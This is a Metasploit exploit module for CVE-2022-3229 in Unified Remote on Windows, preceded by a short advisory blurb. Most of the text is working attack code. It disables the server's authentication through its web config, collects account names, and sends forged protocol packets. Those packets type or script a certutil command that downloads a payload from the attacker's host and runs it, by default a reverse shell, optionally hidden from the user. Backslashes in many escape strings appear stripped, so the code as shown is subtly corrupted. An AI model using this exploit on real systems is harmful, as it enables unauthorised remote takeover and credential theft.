Authored by h00die, H4rk3nz0 | Site metasploit.com

This Metasploit module utilizes the Unified Remote remote control protocol to type out and deploy a payload. The remote control protocol can be configured to have no passwords, a group password, or individual user accounts. If the web page is accessible, the access control is set to no password for exploitation, then reverted. If the web page is not accessible, exploitation will be tried blindly. This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.

advisories | CVE-2022-3229

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Exploit::Remote::Tcp
# attempted cmdstger, however there was so much sleep involved for the screen to clear the buffer
# that it was going to take hours. The buffer would also overrun itself and the exploit would fail
# if not enough sleep time was used. it was a nightmare, not for this exploit.
# include Msf::Exploit::CmdStager
include Exploit::EXE # generate_payload_exe
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Unified Remote Auth Bypass to RCE',
'Description' => %q{
This module utilizes the Unified Remote remote control protocol to type out and
deploy a payload. The remote control protocol can be configured to have no passwords,
a group password, or individual user accounts. If the web page is accessible, the
access control is set to no password for exploitation, then reverted.
If the web page is not accessible, exploitation will be tried blindly.
This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'H4RK3NZ0' # edb
],
'References' => [
[ 'EDB', '49587' ],
[ 'URL', 'https://www.unifiedremote.com/' ],
[ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ],
[ 'CVE', '2022-3229' ]
],
'Arch' => [ ARCH_X64, ARCH_X86 ],
'Platform' => 'win',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' => [
['pull', {}],
],
'Payload' => {
'BadChars' => "x0ax00"
},
'DefaultOptions' => {
# since this may get typed out ON SCREEN we want as small a payload as possible
'PAYLOAD' => 'windows/shell/reverse_tcp'
},
'DisclosureDate' => '2021-02-25',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [CRASH_SERVICE_DOWN],
'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen
}
)
)
register_options(
[
OptPort.new('RPORT', [true, 'Port Unified Remote runs on', 9512]),
OptPort.new('WEBSERVER', [true, 'Port Unified Remote web server runs on', 9510]),
OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:WindowsTemp']),
OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
OptBool.new('VISIBLE', [false, 'Make exploitation visible to the user', false]),
]
)
end

def win_key
'LWIN' # 4c57494e
end

def ret_key
'RETURN' # 52455455524e
end

def space_key
'SPACE' # 5350414345
end

def path
return datastore['PATH'] if datastore['PATH'].end_with? ''

"#{datastore['PATH']}"
end

def initialize_packet
initialize_packet = "x00x00x00x85x00x01x08"
initialize_packet << "Actionx00" # 416374696f6e 00
initialize_packet << "x00x05"
initialize_packet << "Passwordx00" # 50617373776f7264 00
initialize_packet << '8e8133b3-a18b-43af-a7cd-e04f747827ce' # 38653831333362332d613138622d343361662d613763642d653034663734373832376365 seems to be a default
initialize_packet << "x00x05"
initialize_packet << "Platformx00" # 506c6174666f726d 00
initialize_packet << "androidx00" # 616e64726f6964 00
initialize_packet << "x08"
initialize_packet << "Requestx00" # 52657175657374 00
initialize_packet << "x00x05"
initialize_packet << "Sourcex00" # 536f7572636500
# this line shows up in logs as who connected
initialize_packet << "#{@client_name}x00" # 616e64726f69642d64373038653134653532383463623831 00
initialize_packet << "x03"
initialize_packet << "Versionx00" # 56657273696f6e 00
initialize_packet << "x00x00x00x0ax00"
end

def empty_authentication
empty_authentication = "x00x00x00xc8x00x01x08"
empty_authentication << "Actionx00" # 416374696f6e 00
empty_authentication << "x01x02"
empty_authentication << "Capabilitiesx00" # 4361706162696c6974696573 00
empty_authentication << "x04"
empty_authentication << "Actionsx00" # 416374696f6e73 00
empty_authentication << "x01x04"
empty_authentication << "Encryption2x00" # 456e6372797074696f6e32 00
empty_authentication << "x01x04"
empty_authentication << "Fastx00" # 46617374 00
empty_authentication << "x00x04"
empty_authentication << "Gridx00" # 47726964 00
empty_authentication << "x01x04"
empty_authentication << "Loadingx00" # 4c6f6164696e6700
empty_authentication << "x01x04"
empty_authentication << "Syncx00" # 53796e6300
empty_authentication << "x01x00x05"
empty_authentication << "Passwordx00" # 50617373776f7264 00
empty_authentication << 'd634c1dcfdeb8735608a4a104ded4076de766dd61443619809ad7f35858d4492' # 64363334633164636664656238373335363038613461313034646564343037366465373636646436313434333631393830396164376633353835386434343932 seems to be a default
empty_authentication << "x00x08"
empty_authentication << "Requestx00" # 52657175657374 00
empty_authentication << "x01x05"
empty_authentication << "Sourcex00" # 536f7572636500
# this line shows up in logs as who connected
empty_authentication << "#{@client_name}x00" # 616e64726f69642d64373038653134653532383463623831 00
empty_authentication << "x00"
end

#############################################
# These methods/packets are for visible mode
#############################################

def string_header_one(length)
# 2 null, then message length takes next 2 spots
string_header_one = "x00x00"
string_header_one << [length].pack('n').to_s
end

def string_header_two
string_header_two = "x00x01x08"
string_header_two << "Actionx00" # 416374696f6e 00
string_header_two << "x07x05"
string_header_two << "IDx00" # 4944 00
string_header_two << "Relmtech.Keyboardx00" # 52656c6d746563682e4b6579626f617264 00
string_header_two << "x02"
string_header_two << "Layoutx00" # 4c61796f7574 00
string_header_two << "x06"
string_header_two << "Controlsx00" # 436f6e74726f6c73 00
string_header_two << "x02x00x02"
string_header_two << "OnActionx00" # 4f6e416374696f6e 00
string_header_two << "x02"
string_header_two << "Extrasx00" # 457874726173 00
string_header_two << "x06"
string_header_two << "Valuesx00" # 56616c756573 00
string_header_two << "x02x00x05"
string_header_two << "Valuex00" # 56616c7565 00
end

def string_footer
string_footer = "x00x00x00x00x05"
string_footer << "Namex00" # 4e616d65 00
string_footer << "togglex00" # 746f67676c65 00
string_footer << "x00x05"
string_footer << "Sourcex00" # 536f75726365 00
# this line shows up in logs as who connected
string_footer << "#{@client_name}x00" # 616e64726f69642d64373038653134653532383463623831 00
string_footer << "x00"
end

def send_key(key, press_return: false)
if key == ' '
key = space_key
end
contents = "#{string_header_two}#{key}#{string_header_three}#{key}#{string_footer}"
contents = "#{string_header_one(contents.length)}#{contents}"
sock.put(contents)
if press_return
contents = "#{string_header_two}#{ret_key}#{string_header_three}#{ret_key}#{string_footer}"
contents = "#{string_header_one(contents.length)}#{contents}"
sock.put(contents)
end
end

##############################################
# These methods/packets are for invisible mode
##############################################

def load_unified_command
# header: 00 00 00 5e
wait = "x00x01x08"
wait << "Actionx00" # 416374696f6e 00
wait << "x03x05" # changed from the previous one from 07 to 03
wait << "IDx00" # 4944 00
wait << "Unified.Commandx00" # 556e69666965642e436f6d6d616e64 00
wait << "x02"
wait << "Layoutx00" # 4c61796f7574 00
wait << "x03"
wait << "Hashx00" # 48617368 00
wait << "x9exd0x99:x00" # 9ed0993a 00
wait << "x08"
wait << "Requestx00" # 52657175657374 00
wait << "x03x05" # changed from the previous one from 07 to 03
wait << "Sourcex00" # 536f7572636500
wait << "#{@client_name}x00"
wait << "x00"
end

def create_script
# header: 00 00 00 e2
new_onee = "x00x01x08"
new_onee << "Actionx00" # 416374696f6e 00
new_onee << "x07x05"
new_onee << "IDx00" # 4944 00
new_onee << "Unified.Commandx00" # 556e69666965642e436f6d6d616e64 00
new_onee << "x02"
new_onee << "Layoutx00" # 4c61796f7574 00
new_onee << "x06"
new_onee << "Controlsx00" # 436f6e74726f6c73 00
new_onee << "x02x00x02"
new_onee << "OnActionx00" # 4f6e416374696f6e 00
new_onee << "x02"
new_onee << "Extrasx00" # 457874726173 00
new_onee << "x06"
new_onee << "Valuesx00" # 56616c756573 00
new_onee << "x02x00x05"
new_onee << "Keyx00" # 4b6579 00
new_onee << "Textx00" # 54657874 00
new_onee << "x05"
new_onee << "Valuex00" # 56616c7565 00
new_onee << "x00x00x00x00x05"
new_onee << "Namex00" # 4e616d65 00
new_onee << "updatex00" # 757064617465 00
new_onee << "x00x08"
new_onee << "Typex00" # 54797065 00
new_onee << "x08x00x00x00x08"
new_onee << "Requestx00" # 52657175657374 00
new_onee << "x07x02"
new_onee << "Runx00" # 52756e 00
new_onee << "x02"
new_onee << "Extrasx00" # 457874726173 00
new_onee << "x06"
new_onee << "Valuesx00" # 56616c756573 00
new_onee << "x02x00x05"
new_onee << "Keyx00" # 4b6579 00
new_onee << "Textx00" # 54657874 00
new_onee << "x05"
new_onee << "Valuex00" # 56616c7565 00
new_onee << "x00x00x00x00x05"
new_onee << "Namex00" # 4e616d65 00
new_onee << "updatex00" # 757064617465 00
new_onee << "x00x05"
new_onee << "Sourcex00" # 536f75726365 00
new_onee << "#{@client_name}x00"
new_onee << "x00"
end

def initialize_keyboard
# header 00 00 00 4b
new_twoo = "x00x01x08"
new_twoo << "Actionx00" # 416374696f6e 00
new_twoo << "x05x05"
new_twoo << "IDx00" # 4944 00
new_twoo << "Unified.Commandx00" # 556e69666965642e436f6d6d616e64 00
new_twoo << "x08"
new_twoo << "Requestx00" # 52657175657374 00
new_twoo << "x05x05"
new_twoo << "Sourcex00" # 536f75726365 00
new_twoo << "#{@client_name}x00"
new_twoo << "x00"
end

def add_content(command)
# header is dymanic based on length of command
new_threee = "x00x01x08"
new_threee << "Actionx00" # 416374696f6e 00
new_threee << "x07x05"
new_threee << "IDx00" # 4944 00
new_threee << "Unified.Commandx00" # 556e69666965642e436f6d6d616e64 00
new_threee << "x02"
new_threee << "Layoutx00" # 4c61796f7574 00
new_threee << "x06"
new_threee << "Controlsx00" # 436f6e74726f6c73 00
new_threee << "x02x00x02"
new_threee << "OnActionx00" # 4f6e416374696f6e 00
new_threee << "x02"
new_threee << "Extrasx00" # 457874726173 00
new_threee << "x06"
new_threee << "Valuesx00" # 56616c756573 00
new_threee << "x02x00x05"
new_threee << "Keyx00" # 4b6579 00
new_threee << "Textx00" # 54657874 00
new_threee << "x05"
new_threee << "Valuex00" # 56616c7565 00
new_threee << command
new_threee << "x00x00x00x00x05"
new_threee << "Namex00" # 4e616d65 00
new_threee << "updatex00" # 757064617465 00
new_threee << "x00x08"
new_threee << "Typex00" # 54797065 00
new_threee << "x08x00x00x00x08"
new_threee << "Requestx00" # 52657175657374 00
new_threee << "x07x02"
new_threee << "Runx00" # 52756e 00
new_threee << "x02"
new_threee << "Extrasx00" # 457874726173 00
new_threee << "x06"
new_threee << "Valuesx00" # 56616c756573 00
new_threee << "x02x00x05"
new_threee << "Keyx00" # 4b6579 00
new_threee << "Textx00" # 54657874 00
new_threee << "x05"
new_threee << "Valuex00" # 56616c7565 00
new_threee << command
new_threee << "x00x00x00x00x05"
new_threee << "Namex00" # 4e616d65 00
new_threee << "updatex00" # 757064617465 00
new_threee << "x00x05"
new_threee << "Sourcex00" # 536f75726365 00
new_threee << "#{@client_name}x00"
new_threee << "x00"
end

def execute_script
# header 00 00 00 96
new_fourr = "x00x01x08"
new_fourr << "Actionx00" # 416374696f6e 00
new_fourr << "x07x05"
new_fourr << "IDx00" # 4944 00
new_fourr << "Unified.Commandx00" # 556e69666965642e436f6d6d616e64 00
new_fourr << "x02"
new_fourr << "Layoutx00" # 4c61796f7574 00
new_fourr << "x06"
new_fourr << "Controlsx00" # 436f6e74726f6c73 00
new_fourr << "x02x00x02"
new_fourr << "OnActionx00" # 4f6e416374696f6e 00
new_fourr << "x05"
new_fourr << "Namex00" # 4e616d65 00
new_fourr << "executex00" # 65786563757465 00
new_fourr << "x00x08"
new_fourr << "Typex00" # 54797065 00
new_fourr << "x08x00x00x00x08"
new_fourr << "Requestx00" # 52657175657374 00
new_fourr << "x07x02"
new_fourr << "Runx00" # 52756e 00
new_fourr << "x05"
new_fourr << "Namex00" # 4e616d65 00
new_fourr << "executex00" # 65786563757465 00
new_fourr << "x00x05"
new_fourr << "Sourcex00" # 536f75726365 00
new_fourr << "#{@client_name}x00"
new_fourr << "x00"
end

def string_header_three
string_header_three = "x00x00x00x00x05"
string_header_three << "Namex00" # 4e616d65 00
string_header_three << "togglex00" # 746f67676c65 00
string_header_three << "x00x08"
string_header_three << "Typex00" # 54797065 00
string_header_three << "x08x00x00x00x08"
string_header_three << "Requestx00" # 52657175657374 00
string_header_three << "x07x02"
string_header_three << "Runx00" # 52756e 00
string_header_three << "x02"
string_header_three << "Extrasx00" # 457874726173 00
string_header_three << "x06"
string_header_three << "Valuesx00" # 56616c756573 00
string_header_three << "x02x00x05"
string_header_three << "Valuex00" # 56616c7565 00
end

def on_request_uri(cli, _req)
p = generate_payload_exe
send_response(cli, p)
print_good("Payload request received, sending #{p.length} bytes of payload for staging")
end

def restart_server
http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
# http client overrides sock, so we had to pick one... long live sock
request = "GET /system/restart HTTP/1.1rn"
request << "Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}rn"
request << "rn"

http_sock.put(request)
disconnect
print_status('Sleeping 5 seconds for server to restart')
sleep(5)
end

def set_config(config)
print_status('Uploading new server config')
http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
# http client overrides sock, so we had to pick one... long live sock
request = "POST /system/config HTTP/1.1rn"
request << "Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}rn"
request << "Accept: application/json, text/javascript, */*; q=0.01rn"
request << "Content-Type: application/jsonrn"
request << "X-Requested-With: XMLHttpRequestrn"
request << "Content-Length: #{config.to_json.length}rn"
request << "rn"
request << config.to_json

http_sock.put(request)
begin
http_sock.get_once(-1)
rescue EOFError
return nil
end

disconnect
restart_server
end

def get_config
print_status('Retrieving server config')
http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
# http client overrides sock, so we had to pick one... long live sock
request = "GET /system/config HTTP/1.1rn"
request << "Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}rn"
request << "rn"

http_sock.put(request)
begin
res = http_sock.get_once(-1)
rescue EOFError
return nil
end
disconnect
body = res.split("rnrn")[1]
if body.include?('<h1>Forbidden (403)</h1>')
print_error('Web interface is disabled. Unable to attempt bypass, assuming no authentication.')
return nil
else
# transient error where the JSON doesn't fully receive maybe 1/15 tries in my testing
begin
return JSON.parse(body) # split between headers and body
rescue JSON::ParserError
return nil
end
end
end

def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
last_attempted_at: DateTime.now,
proof: opts[:proof]
}.merge(service_data)

create_credential_login(login_data)
end

def check
security_mode = get_config
if security_mode.nil?
return CheckCode::Unknown('Unable to get config from web server, unknown status of Unified Remote Controller')
end

CheckCode::Vulnerable("Unified Remote is vulnerable on port #{security_mode['interfaces']['tcp']['port']} with security mode '#{security_mode['security']['mode']}' (can be bypassed, if needed)")
end

def exploit
if datastore['CLIENTNAME'].blank?
@client_name = "android-#{Rex::Text.rand_text_alphanumeric(16)}"
print_status("Client name set to: #{@client_name}")
else
@client_name = datastore['CLIENTNAME']
end
# first grab the config from the HTTP server to determine if we need to disable auth
security_mode = get_config
reset_security_mode = nil
unless security_mode.nil?
if security_mode['security']['mode'] == 'none'
print_good('No security enabled')
else
print_status("#{security_mode['security']['mode']} mode enabled, password required, bypassing")
reset_security_mode = security_mode['security']['mode']
security_mode['security']['mode'] = 'none'
set_config(security_mode)
end
# now that we have the config, check if theres any users, no passwords (theyre GUIDs)
security_mode['security']['users'].each do |account|
print_good("Found account: #{account['username']}")
report_cred(
ip: rhost,
port: rport,
service_name: 'wifi mouse',
user: account['username'],
password: '',
proof: account
)
end
end

# start actually exploiting the rdp-ish server
connect
print_status('Sending handshake')
sock.put(initialize_packet)
sleep(datastore['SLEEP'])
print_status('Sending empty authentication')
sock.put(empty_authentication)
sleep(datastore['SLEEP'])

filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
register_file_for_cleanup("#{path}#{filename}")
# this method was in the original edb exploit, this is significantly faster
# and speed is of the essence since remote user input most likely breaks this module
stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"
start_service('Path' => '/') # start webserver

if datastore['VISIBLE']
print_status('Opening Start Menu')
# original exploit sent it twice, so we follow that
send_key(win_key)
send_key(win_key)
sleep(datastore['SLEEP'])

print_status('Opening command prompt')
'cmd.exe'.each_char do |letter|
send_key(letter)
end
send_key(ret_key)
sleep(datastore['SLEEP'])

print_status('Typing out payload')
stager.each_char do |letter|
send_key(letter)
end
send_key(ret_key)
sleep(datastore['SLEEP'] * 2) # give time for it to save

print_status('Attempting to open payload')
"#{path}#{filename} && exit".each_char do |letter|
send_key(letter)
end
send_key(ret_key)
else
stager << " && #{path}#{filename} && exit"
print_status('Loading Unified.Command')
contents = load_unified_command
sock.put("#{string_header_one(contents.length)}#{contents}")
sleep(datastore['SLEEP'])

print_status('Updating Unified.Command')
contents = create_script
sock.put("#{string_header_one(contents.length)}#{contents}")
sleep(datastore['SLEEP'])

contents = initialize_keyboard
sock.put("#{string_header_one(contents.length)}#{contents}")
sleep(datastore['SLEEP'])

print_status('Sending payload')
contents = add_content(stager)
sock.put("#{string_header_one(contents.length)}#{contents}")
sleep(datastore['SLEEP'])

print_status('Executing script')
contents = execute_script
sock.put("#{string_header_one(contents.length)}#{contents}")
sleep(datastore['SLEEP'])

contents = create_script
sock.put("#{string_header_one(contents.length)}#{contents}")
sleep(datastore['SLEEP'])
end

handler
disconnect
sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert

# lastly some cleanup
unless reset_security_mode.nil?
print_status('Reverting security mode')
security_mode['security']['mode'] = reset_security_mode
set_config(security_mode)
end
end
end